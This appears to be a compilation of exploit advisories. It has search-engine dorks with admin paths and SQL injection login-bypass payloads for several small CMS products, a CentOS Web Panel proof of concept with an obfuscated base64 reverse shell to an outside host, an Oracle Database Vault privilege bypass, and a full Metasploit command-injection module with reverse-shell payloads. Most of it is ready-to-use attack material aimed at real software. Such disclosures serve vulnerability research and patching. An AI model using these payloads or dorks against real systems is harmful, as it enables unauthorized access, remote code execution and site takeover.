<pre><code>====================================================================================================================================<br />| # Title : Dcastalia CMS v1.2 Unauthorized administrative access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.1(64-bit) | <br />| # Vendor : https://dcastalia.com/ | <br />| # Dork : "Designed & developed by dcastalia" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] admin Panle : /admin/site/login<br /><br />[+] Use payload : /admin/Packet.Storm*Security <br /><br />[-] When you add any value (For Example : a path or a variable) after the control panel folder, <br /> an error page appears because the required file does not exist. <br /> At the same time, it shows you the control panel for the site, and it gives you control powers according to the site, <br /> including limited and full ones.<br /><br />[+] https://www.127.0.0.1/admin/Packet%20Storm%20Security or https://www.127.0.0.1.com/admin/rbac/route<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Corpatech cms v2 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://www.corpatech.be/ | <br />| # Dork : CorpaTech SiteAdmin |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] http://127.0.0.1/galleriet.be/shop.php?cat=5 <====| inject here<br /><br />[+] http://127.0.0.1/galleriet.be/admina/ <====| Login<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : BDWeb-Link Lms v1.11.5 Unauthorized administrative access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://bdweblink.com | <br />| # Dork : Developed by Developed by BD Web Link |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use the payload to access the control panel and see the administration menu : load-admin-list.php or load-active-user-list.php<br /><br />[+] https://127.0.0.1/bdweblink/load-active-user-list.php or https://127.0.0.1/bdweblink/load-admin-list.php<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : AdminSeg v2.15 Unauthorized administrative access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.1(64-bit) | <br />| # Vendor : https://www.arwebs.net/producto/insurance-administration-software.html | <br />| # Dork : AdminSeg v2.15 |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] by using this payload you can access directly at admin panel .<br /><br />[+] payload : /adminseg/polizas.php<br /><br />[+] https://www.127.0.0.1/v2.15/adminseg/polizas.php<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ADMINA BULGARIA Ltd v 1.0 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://admina.me/ | <br />| # Dork : " ADMINA BULGARIA Ltd.. All Rights Reserved. ." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] http://127.0.0.1/ADMINA/news_preview.php?getID=216 <====| inject here<br /><br />[+] http://127.0.0.1/ADMINA/admina/ <====| Login<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Eatself v1.1.5 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://eatself.com/ | <br />| # Dork : " © Eatself. Tous droits réservés - v1.1.5." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user : 'or''='@gmail.com& Pass : 'or''=' (toltal control of admin panel )<br /><br />[+] https://127.0.0.1/app.eatself/admin-login<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Excel Net Computer Institute Version 4.1 SQL injection authentication bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.excelnet.org/ | <br />| # Dork : "photos_view.php?pid=" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use path (/new/) to access at admin panel & Full control of website .<br /><br />[+] Use payload for login information = user & pass : 1' or 1=1 -- -<br /><br />[+] https://127.0.0.1/excelnet.41org/new/lead_home.php<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>[+] Centos Web Panel 7 Unauthenticated Remote Code Execution<br />[+] Centos Web Panel 7 - < 0.9.8.1147<br />[+] Affected Component ip:2031/login/index.php?login=$(whoami)<br />[+] Discoverer: Numan Türle @ Gais Cyber Security<br />[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194<br />[+] CVE: CVE-2022-44877<br /><br /><br />Description<br />--------------<br />Bash commands can be run because double quotes are used to log incorrect entries to the system.<br /><br />Video Proof of Concept<br />--------------<br />https://www.youtube.com/watch?v=kiLfSvc1SYY<br /><br /><br />Proof of concept:<br />--------------<br />POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1<br />Host: 10.13.37.10:2031<br />Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82<br />Content-Length: 40<br />Origin: https://10.13.37.10:2031<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: https://10.13.37.10:2031/login/index.php?login=failed<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en<br />Connection: close<br /><br />username=root&password=toor&commit=Login<br />--------------<br /><br />Solution<br />--------<br />Upgrade to CWP7 current version.<br /><br /><br /></code></pre>
<pre><code><br />Title: CVE-2021-2175 – Oracle Database Vault Metadata Exposure Vulnerability<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 12.1.0.2, 12.2.0.1, 18c, 19c<br />Tested Version(s): 19c<br />Risk Level: low<br />Solution Status: Fixed<br />CVE Reference: CVE-2021-2175<br />Author of Advisory: Emad Al-Mousa<br /><br />Overview:<br /><br />Oracle database vault is a security feature that imposes segregation of duties such as account managemenet, authorization,....etc. So, in a nutshell a DBA/System Admin with access to "SYS" user has limited power in terms of data viewership, account creation,.....etc. The powers of SYS account are stripped down.<br /><br /><br />*****************************************<br />Vulnerability Details:<br /><br />Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any View, Select Any View privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Database Vault accessible data [Meta-data].<br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />The DBA_DV_REALM data dictionary view lists the realms (security policies configured for data protection) created in the current database instance, such information SYS user by default has NO ACCESS to since it exposes what security measures of data protection is configured.<br /><br />Access the database as SYS account:<br /><br />sqlplus / as sysdba<br /><br />SQL> SELECT * FROM DBA_DV_REALM;<br /><br />ERROR at line 1:<br /><br />ORA-01031: insufficient privileges<br /><br />// as expected SYS account can't view the database view contents.....However...let us do the following:<br /><br />SQL> create view ORACLE_OCM.DUMMY_V as select * from DBA_DV_REALM;<br /><br />SQL> select * from ORACLE_OCM.DUMMY_V;<br /><br />// ORACLE_OCM account is misconfigured and was granted extra access to the view so when you create the view under it....you will be access the view content....and now you can see/view the vault realm policies are configured to protect what exactly within the database system.<br /><br />*****************************************<br />References:<br />https://www.oracle.com/security-alerts/cpuapr2021.html<br />https://databasesecurityninja.wordpress.com/2022/02/02/cve-2021-2175-database-vault-metadata-exposure-vulnerability/<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-2175<br /><br /><br />Credit:<br />Emad Al-Mousa: CVE-2021-35576<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'rex/stopwatch'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Linear eMerge E3-Series Access Controller Command Injection',<br /> 'Description' => %q{<br /> This module exploits a command injection vulnerability in the Linear eMerge<br /> E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable<br /> to unauthenticated command injection in card_scan_decoder.php via the `No` and `door` HTTP GET parameter.<br /> Successful exploitation results in command execution as the `root` user.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2019-7256'],<br /> [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],<br /> [ 'URL', 'https://na.niceforyou.com/' ],<br /> [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],<br /> [ 'EDB', '47649'],<br /> [ 'PACKETSTORM', '155256']<br /> ],<br /> 'DisclosureDate' => '2019-10-29',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_ARMLE],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80,<br /> 'SSL' => false<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('ROOT_PASSWORD', [ true, 'default root password on a vulnerable Linear eMerge E3-Series access controller', 'davestyle']),<br /> ]<br /> )<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> random_no = rand(30..100)<br /> return send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),<br /> 'vars_get' =><br /> {<br /> 'No' => random_no,<br /> 'door' => "`echo #{datastore['ROOT_PASSWORD']}|su -c \"#{cmd}\"`"<br /> }<br /> })<br /> rescue StandardError => e<br /> elog("#{peer} - Communication error occurred: #{e.message}", error: e)<br /> fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")<br /> end<br /><br /> # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution<br /> def check<br /> print_status("Checking if #{peer} can be exploited.")<br /> sleep_time = rand(2..10)<br /> print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")<br /> res, elapsed_time = Rex::Stopwatch.elapsed_time do<br /> execute_command("sleep #{sleep_time}")<br /> end<br /><br /> return CheckCode::Unknown('No response received from the target!') unless res<br /> return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200 && !res.body.blank? && res.body =~ /"card_format_default":"/<br /><br /> print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")<br /> return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time<br /><br /> CheckCode::Vulnerable('Successfully tested command injection.')<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :unix_cmd<br /> print_status("Executing #{target.name} with #{payload.encoded}")<br /> # Don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> print_status("Executing #{target.name}")<br /> execute_cmdstager(linemax: 262144)<br /> end<br /> end<br />end<br /></code></pre>